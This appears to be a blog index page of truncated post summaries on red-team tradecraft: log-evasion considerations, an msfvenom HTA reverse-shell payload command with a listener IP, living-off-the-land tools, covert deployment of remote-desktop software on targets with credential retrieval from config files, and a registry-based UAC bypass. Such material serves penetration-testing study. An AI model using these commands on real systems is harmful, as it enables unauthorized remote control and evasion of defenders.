摘要:
前置基础 虽然很容易想到直接删除日志来规避日志记录,但一般现代环境中日志会启用日志转发,将日志转发到其他设备进行保护,就算是在转发前将日志删除了,也不能规避被发现,首先没有日志就很可疑,然后篡改/删除日志也有对应的日志记录: 事件 ID 目的 1102 Windows 安全审计日志被清除时的日志 1 阅读全文
posted @ 2025-12-04 16:25
shinianyunyan
阅读(28)
评论(0)
推荐(0)
摘要:
HTA 法一:通过投送payload,反弹shell 使用msfvenom生成payload: user@machine$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o thm. 阅读全文
posted @ 2025-12-04 16:25
shinianyunyan
阅读(28)
评论(0)
推荐(0)
摘要:
基本思想 “就地取材”、“本地化存活”是一个有效规避检测的方法,通过利用win自带、由微软签发的的工具、命令、脚本等进行攻击利用能使攻击更加隐蔽,不易发现,常用的工具集如下: Windows Sysinternals 工具集:包含多个类别,包括:磁盘管理、进程管理、网络工具、系统信息、安全工具;访问 阅读全文
posted @ 2025-12-04 16:25
shinianyunyan
阅读(21)
评论(0)
推荐(0)
摘要:
GoToHTTP使用 使用cs或者其他工具将文件上传到目标机器 运行该文件 shell GotoHTTP_x64.exe 在运行目录下会生成一个配置文件: 查看配置文件里面有连接地址和账号密码: shell type gotohttp.ini 使用网页连接 成功控制目标机器 阅读全文
posted @ 2025-12-04 16:25
shinianyunyan
阅读(13)
评论(0)
推荐(0)
摘要:
安装RustDESK 通过cs上传到目标机器 运行程序 找到配置文件 shell type C:\Users\用户名\AppData\Roaming\RustDesk\config\RustDesk.toml 可以看到没有密码,这个时候需要手写这个密码,然后重启工具; 将这段内容复制下来,然后再本地 阅读全文
posted @ 2025-12-04 16:24
shinianyunyan
阅读(21)
评论(0)
推荐(0)
摘要:
软件安装 与向日葵不同,这个不需要修改注册表项,在命令行使用 /S 参数即可静默安装,没有UAC。 PS:但至少需要管理员才能没有UAC,如果是普通用户依然会显示UAC ToDesk1.exe /S 配置文件修改 todesk的密码没有办法通过解码得到明文,但可以找到目标主机ToDesk中的temp 阅读全文
posted @ 2025-12-04 16:24
shinianyunyan
阅读(17)
评论(0)
推荐(0)
摘要:
安装向日葵 安装时会有一个UAC的弹窗,所以需要绕过UAC,在安装向日葵时有一个以绿色版运行的选项,选择后在注册表中会创建一个键值,之后再运行的时候就可以直接进入软件,不需要进行安装。 UAC绕过 创建一个注册表文件 1.reg,内容如下: Windows Registry Editor Versi 阅读全文
posted @ 2025-12-04 16:24
shinianyunyan
阅读(41)
评论(0)
推荐(0)
浙公网安备 33010602011771号